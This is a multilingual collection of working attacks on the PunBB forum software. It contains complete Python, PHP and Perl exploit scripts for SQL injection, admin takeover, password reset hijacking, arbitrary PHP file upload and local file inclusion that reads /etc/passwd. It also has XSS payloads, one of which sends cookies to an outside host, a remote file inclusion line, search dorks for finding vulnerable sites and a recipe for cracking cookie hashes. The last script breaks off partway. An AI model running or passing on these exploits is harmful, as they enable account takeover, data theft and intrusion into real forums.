PunBB <= 1.2.14 Remote Code Execution Exploit (http://milw0rm.com/exploits/3710)
PunBB version <= 1.2.2 Authentication Bypass Exploit (http://milw0rm.com/exploits/901" )
ShAnKaR: multiple PHP application poison NULL byte vulnerability (http://marc.info/?l=bugtraq&amp;amp;m=115808642715878&amp;amp;w=2)
PunBB 1.2.4 (change_email) SQL Injection Exploit (http://milw0rm.com/exploits/928)

1.2.11
index.php&req_subject=test&req_message=test"><script>alert(1);</script>

<= 1.2.16(moderate.php)
preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host'])) moderate.php?get_host=1.1.1.1<script>alert(1)</script>

<= 1.2.16
moderate.php?get_host=1.1.1.1<script>alert(1)</script>
<= 1.2.15 (message_popup.php) XSS code vulnerability
<?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>

<= 1.2.13 SQL Injection
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
dork: warning: ini_get has been

Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
include/common.php?pun_root=http://www.host_evil.com/cmd?&=id

PunBB <= 1.2.4 - change email to become admin exploit

#!/usr/bin/python
################################################## #####################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
################################################## #####################
# Proof of concept code from the Hardened-PHP Project
################################################## #####################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
################################################## #####################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)

def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()

if len(__argv__) < 10:
usage()

username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg

# Printout banner
banner()

# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)

# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}

wclient = urllib.URLopener()

print "[+] Connecting to retrieve cookie"

req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);

email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

params = {
'req_new_email' : email,
'form_sent' : 1
}

print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
urllib.urlencode(params))

print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"

if __name__ == "__main__":
main()

PunBB BBCode URL Tag Script Injection Vulnerability
www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`styl e='font-size:0;)'



-punbb_users
--id
--group_id
--username
--password

Dork example:
intext:"Powered by PunBB 1.2.5"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog

Алгоритм шифрования в куках:
md5($cookie_seed.md5(password))
Пример:
md5($cookie_seed.md5("123"))="beae53ed5f767f344b03646a1aa5b16e"
В состав строгого значения входят символы из ряда "abcdef1234567890".

Схема генерации куков:
md5($cookie_seed.$pun_user['password'])
$pun_user['password'] - sha1() или md5() хеш пароль пользователя.
$cookie_seed - соль ("идентична" для всех пользователей).

Дефолтное значение алгоритма для $cookie_seed(config.php):
function pun_hash($str)
{
if (function_exists('sha1')) // Only in PHP 4.3.0+
return sha1($str);
else if (function_exists('mhash')) // Only if Mhash library is loaded
return bin2hex(mhash(MHASH_SHA1, $str));
else return md5($str);
}
PasswordPro не обладает алгоритмом перебора md5(salt.md5(pass)) поэтому будем использовать метод "перебор по маске":
"Набор символов" для пользовательской маски: ?1: abcdef1234567890
Маска: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70
Значение длины: 40-40

===
UPDATE: PasswordPro теперь имеет соответствующий модуль

PunBB <= 1.2.16 Blind Password Recovery Exploit

http://www.milw0rm.com/exploits/5165

<?php
/**
* Original : http://sektioneins.de/advisories/SE-2008-01.txt
* Thanks to Stefan Esser, here's the exploit.
*
* Team : EpiBite
* firefox, petit-poney, thot
* Nous tenons a remercier nos mamans et papas respectifs.
* Let's get a fu*** coffee !
*/

// conf
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url
define('EMAIL', 'login_x@epitech.net'); // your email
define('LOGIN', 'login_x'); // your login
define('PASS', '620553.8I73'); // your pass
// Exploit
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL,
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
define('ADMIN', $m[2]);
preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m);
if (count($m))
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
define('DATE', time() - 86400); //just in case, the forum or account
just has been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(EMAIL),
'request_pass=Envoyer')));
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically
get, set manually if there's problem)
printf("Admin mail : %s\n--\n", ADMIN_MAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(ADMIN_MAIL),
'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'redirect_url=index.php',
'req_username='.LOGIN,
'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', "\\", '|');
for ($p = 0; $p < 86400 * 2; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4]."\r";
if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
-8).PASS_MD5ED)) == 0)
{
define('SEED', substr(md5(DATE + $p), -8));
break;
}
}
printf("Seed : %s\n--\n", SEED);
for ($p = 0; $p < 1000000; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4]."\r";
mt_srand((double)$p);
if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
{
define('SRAND', $p);
break;
}
}
printf("SRAND : %s\n--\n", SRAND);
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);//
Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
function random_pass($len)
{
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789';
$password = '';
for ($i = 0; $i < $len; ++$i)
$password .= substr($chars, (mt_rand() % strlen($chars)), 1);
return $password;
}

# milw0rm.com [2008-02-21]

<?php
# PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
# h3ck.[rv.ua], 2008

$host = 'localhost'; # хост
$path = '/punbb/'; # путь к форуму
$file_type = 'image/gif';
$file_name = 'sh1.gif.php'; # название нового файла
$file_code = '<?php phpinfo(); ?>'; # код, который будем выполнять
$cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3 Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c08 04f%22%3B%7D'; # без авторизации не будет работать..
$file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
$post_data = <<<POST
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="form_sent"

1
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="imagefile"; filename="$file_name"
Content-Type: $file_type

${file_content}${file_code}
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="uploadimg"

Submit
------------9cYrkcaQ3YTUyzCSnL8xD2--

POST;
$post_len = strlen($post_data);
$req = <<<REQ
POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
Host: $host
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: $cookie
Content-Length: $post_len
Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
Connection: Close

$post_data
REQ;
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) { echo "$errstr ($errno)<br />\n"; }
else {
echo "Sending... <pre>$req</pre>\n";
fwrite($fp, $req);
while (!feof($fp)) { echo fgets($fp); }
fclose($fp);
}
?>

PunBB Migration Tool 1.4.0

Download URL: http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar

Bug Type:Local File Inclusion

Bug In: converters/index.php

Vulnerable Code:
<?php // Load a specific page else{ if(file_exists($_GET['page'] . '.php')) include $_GET['page'] . '.php'; else include 'settings.php'; ?>

Proof Of Concept:http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00

v1.2.17 punbb.ru rev87
/message_popup.php
message_popup.php?id=0+UNION+SELECT+user_id,concat _ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+номер таблицы,1
узнаем префикс по таблицам.
-----------------------------------SQL<
/message_popup.php?id=0+union+select+user_id,userna me,3,password+from+[PREFIX]users+where+id=2
Узнаем имя и хеш админа.
-----------------------------------SQL<
download.php
/download.php?aid=9+union+select+1,file,3,user_id,n ull,1
просматриваем файлы на хосте
-----------------------------------SQL<


user_id - Ваш id на форуме через который вы зашли

By @Fatal@ aka Doom123


<?php

/**
* @author @Fatal@
* @copyright HWT©2008
*
* PunBB expl0it
*
* Уязвимость существует по причине недостатачной обработки
* входящх данных в файле download.php!
*
* Овтор не несёт ответствености за использоваение данного скрипта!
* Используйте его на свой страх и риск!
*
* Уязвимость нашёл @Fatal@.
*/

if (isset($_POST['start']))
{
if (!empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path']))
{
define("_HOST", $_POST['host']);
define("_PORT", 80);

function cookie($ans)
{
$head = 'Cookie:';
foreach ($ans as $val)
{

if (preg_match('#Set-Cookie:(.+)#is', $val, $pock))
{
$co = explode(';', $pock['1']);
$head .= ' ' . trim($co[0]) . ';';
}
}
return $head . " \r\n";
}

function Prepare_POST_array($arr)
{
$out = '';
foreach ($arr as $key => $line)
{
if ($out == '')
$out .= $key . '=' . urlencode($line);
else
$out .= '&' . $key . '=' . urlencode($line);
}

return $out . "\r\n\r\n";
}

function post_query($path, $param, $cook = '', $AnswerFlag = true)
{
$out = "POST " . $path . " HTTP/1.1\r\n";

if ($param == array())
{
$out = "GET " . $path . " HTTP/1.1\r\n";
$data = "";
} else
$data = Prepare_POST_array($param);

$fp = fsockopen(_HOST, _PORT, $errno, $errstr, 30);
if (!$fp) return false;


$out .= "Host: " . _HOST . "\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n";
$out .= "Content-Length: " . strlen($data) . "\r\n";
$out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n";
$out .= $cook;
$out .= "Connection: Close\r\n\r\n";
$out .= $data;

fwrite($fp, $out);
if ($AnswerFlag)
{
while (!feof($fp))
{
$answer[] = fgets($fp, 1024);
}
} else
$answer = true;


fclose($fp);
return $answer;
}
$array = array(
'form_sent' => '1',
'redirect_url' => 'index.php',
'req_username' => $_POST['login'],
'req_password' => $_POST['pass'],
);

$ans = post_query($_POST['path'].'login.php?action=in', $array);
$a = cookie($ans);

if($_POST['method'] != 2)
{
if (!empty($_POST['nid']))
{
if(empty($a))
$error = 'Не верно введены логин или пароль';

else {
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3, '.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid'];

$ans2 = post_query($page, array(), $a);
$str = implode('',$ans2);

if(strrpos($str, "doesn't exist (Errno: 1146)") !== false)
{
preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is",$str,$pock);
$hex = '0x'.bin2hex($pock[1]);
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name, 3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+ta ble_schema+like+'.$hex;
$ans3 = post_query($page, array(), $a);
$str = implode('',$ans3);
preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is',$str,$pock);
$pref = isset($pock[1]) ? $pock[1] : $_POST['prefix'];
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3, '.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_PO ST['nid'];
$ans2 = post_query($page, array(), $a);
$str = implode('',$ans2);
}
preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is',$str,$pock);
echo "<center><b><h1>Хеш пользователя:".$pock[1]."</h1></b></center>";
}
} else
$error = "Введите все данные";
} else {
if (!empty($_POST['file']))
{
if(empty($a))
$error = 'Не верно введены логин или пароль';

else {
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6';
$ans2 = post_query($page, array(), $a);
$i = 11;
while(array_key_exists($i,$ans2))
{
echo htmlspecialchars($ans2[$i]).'<br>';
$i++;
}
}
} else
$error = "ВВедите все данные";

}
} else
$error = "ВВедите все данные";
}

if(isset($error) || !isset($_POST['start']))
{
echo '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>";
echo '<form method="post">';
echo 'Хост: <input type="text" name="host"><br>';
echo 'Путь: <input type="text" name="path"><br>';
echo 'Префикс: <input type="text" name="prefix"><br>';
echo 'Логин: <input type="text" name="login"><br>';
echo 'Пароль: <input type="text" name="pass"><br>';
echo 'В.id: <input type="text" name="id"><br>';
echo 'Н.id: <input type="text" name="nid"><br>';
echo 'Файл: <input type="text" name="file"><br>';
echo 'Метод: <select name=method><option value=1>Извлечь хэш</option>';
echo '<option value=2>Просмотреть файл</option></select><br>';
echo '<input type="submit" name="start"></form>';
echo '<br><br>В.id - id вашего пользоваетля';
echo '<br>Н.id - id жертвы(Нжно заполнять при первом методе)';
echo '<br>Файл - Путь до файла (При втором методе)';
echo '<br>Путь - Папка форума например /path/ (Если форум не находатся в папке вводим /)';
echo '<br>Префикс - Обычно определяется сам но если не хватает доступа подставляется ваш';
echo '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>';
}
?>

XSS в самой последней версии 1.3RC

http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1

PunBB версии до 1.2.19

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и обойти некоторые ограничения безопасности.

1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии include/parser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю внедрить произвольные SMTP команды.

видео:

XSS в PunBB 1.x (http://video.antichat.ru/file48.html)
Дефейс сайта через уязвимость в PunBB (php include) (http://video.antichat.ru/file35.html)
Новая уязвимость PunBB (http://video.antichat.ru/file27.html)

http://www.milw0rm.com/exploits/7159
<?php

error_reporting(0);
ini_set("default_socket_timeout",5);




/*


PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
-----------------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/files.php?pid=52
download cms http://punbb.org
-----------------------------------------------------------
register_globals = 1
magic_quotes_gpc = 1

Directory (files/include/pms)

functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
profile_send.php?pun_user[language]=../../../../../etc/passwd
viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd

../../etc/passwd and nullbyte



File (files/include/pms/functions_navlinks.php)

1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

$pun_user['language'] isn't declared :D you can include any file

functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
-------------------------------------------------------------------

File (files/include/pms/header_new_messages.php)

1. <?php
2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

$pun_user['g_pm'] isn't declared
$pun_config['o_pms_enabled'] isn't declared

header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00


-------------------------------------------------------------------

File (files/include/pms/profile_send.php))

1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

$pun_user['language'] isn't declared

profile_send.php?pun_user[language]=../../../../etc/passwd%00

-------------------------------------------------------------------

File (files/include/pms/viewtopic_PM-link.php)

1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

$pun_user['language'] isn't declared

viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00

-------------------------------------------------------------------


Usage: php [punbb.php] [host/path] [mode]
php [punbb.php] [host/path] [save]
php [punbb.php] [host/path] [NULL]

Example:
php punbb.php localhost/punbb save
php punbb.php localhost/punbb


NOTE: Don't add me on MSN Messenger



*/

$exploit = new Exploit;
$domain = $argv[1];
$mymode = $argv[2];

$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain,$mymode);



class Exploit
{

function http_request($host,$data)
{

if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
{
echo "socket_create() error!\r\n";
exit;
}
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADC AST,1))
{
echo "socket_set_option() error!\r\n";
exit;
}

if(!socket_connect($socket,$host,80))
{
echo "socket_connect() error!\r\n";
exit;
}
if(!socket_write($socket,$data,strlen($data)))
{
echo "socket_write() errror!\r\n";
exit;
}

while($get = socket_read($socket,1024,PHP_NORMAL_READ))
{
$content .= $get;
}

socket_close($socket);


$array = array(
'HTTP/1.1 404 Not Found',
'HTTP/1.1 300 Multiple Choices',
'HTTP/1.1 301 Moved Permanently',
'HTTP/1.1 302 Found',
'HTTP/1.1 304 Not Modified',
'HTTP/1.1 400 Bad Request',
'HTTP/1.1 401 Unauthorized',
'HTTP/1.1 402 Payment Required',
'HTTP/1.1 403 Forbidden',
'HTTP/1.1 405 Method Not Allowed',
'HTTP/1.1 406 Not Acceptable',
'HTTP/1.1 407 Proxy Authentication Required',
'HTTP/1.1 408 Request Timeout',
'HTTP/1.1 409 Conflict',
'HTTP/1.1 410 Gone',
'HTTP/1.1 411 Length Required',
'HTTP/1.1 412 Precondition Failed',
'HTTP/1.1 413 Request Entity Too Large',
'HTTP/1.1 414 Request-URI Too Long',
'HTTP/1.1 415 Unsupported Media Type',
'HTTP/1.1 416 Request Range Not Satisfiable',
'HTTP/1.1 417 Expectation Failed',
'HTTP/1.1 Retry With',
);


for($i=0;$i<=count($array);$i++)

if(eregi($array[$i],$content))
{
return ("$array[$i]\r\n");
break;
}
else
{
return ("$content\r\n");
break;
}
}


function is_vulnerable($host)
{
$host = explode('/',$host);

$header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
$header .= "Host: $host[0]\r\n";
$header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .= "Accept-Language: en-us,en;q=0.5\r\n";
$header .= "Accept-Encoding: gzip,deflate\r\n";
$header .= "Connection: close\r\n\r\n";

if(stristr($this->http_request($host[0],$header),"\\'"))
{
echo "[+] Magic Quotes GPC/Register Globals On!\n";
echo "[+] Exploit Failed!\n";
exit;
}
else
{
return false;
}
}

function starting()
{

global $argv;

if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
{

echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
echo " -----------------------------------------------------------\r\n";
echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
echo "[+] Usage: php $argv[0] [host/path] \r\n";
exit;

}
}

function exploiting($host,$mode)
{

$host = explode('/',$host);
$i = 0;


echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
echo "[+] Local File: ";

$file = stripslashes(trim(fgets(STDIN)));

if(empty($file)) die("you fail");


$array = array (
"functions_navlinks.php?pun_user[language]=$file",
"profile_send.php?pun_user[language]=$file",
"viewtopic_PM-link.php?pun_user[language]=$file",
"header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
);

$write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
$write .= "Host: $host[0]\r\n";
$write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$write .= "Accept-Language: en-us,en;q=0.5\r\n";
$write .= "Accept-Encoding: gzip,deflate\r\n";
$write .= "Connection: close\r\n\r\n";




if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
{
$i++;
}
else
{
if($mode == "save")
{

$rand = rand(0,99999);
fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));

echo "[+] File $rand Saved Successfully!\r\n";
echo "[+] Exploit Terminated!\r\n";
exit;

}
else
{
echo $this->http_request($host[0],$write);
exit;
}
}
}
}

#!/usr/bin/perl

=about

PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org

register globals = 1
magic quotes gcp = 1



File (include/login.php)

1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';


$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared

include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00

how to fix?use the latest version (2.0)

Usage: perl punbb.pl localhost/cms

=cut


use strict;
use warnings;
use IO::Socket;


my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;

my ($host,$path) = @take;

if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}

print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";

chomp(my $file = <STDIN>);

if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}


my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;

my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";

$sock->send($data);

while(<$sock>) {
$html .= $_;
}

if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';

open(FILE,">",$name);
print FILE $html;
close(FILE);

print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}


sub help {
print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
"by athos - staker[at]hotmail[dot]it\n".
"Usage: perl $0 [host/path]\n";
exit;
}

http://www.milw0rm.com/exploits/7168 (с)

PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
&usage();
exit();
}
my $Message = "";
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
my $DefaultTime = request($Referrer);

sub Login(){
my $Login = $HTTP->post($Host.'login.php?action=in',
[
form_sent => '1',
redirect_url => 'forums.php',
req_username => $UserName,
req_password => $PassWord,
login => 'Login',
]) || die $!;

if($Login->content =~ /Logged in successfully./i){
return 1;
}else{
return 0;
}
}
if (Login() == 1){
$Message = " * Logged in as: ".$UserName;
}elsif (Login() == 0){
$Message = " * Login Failed.";
refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}

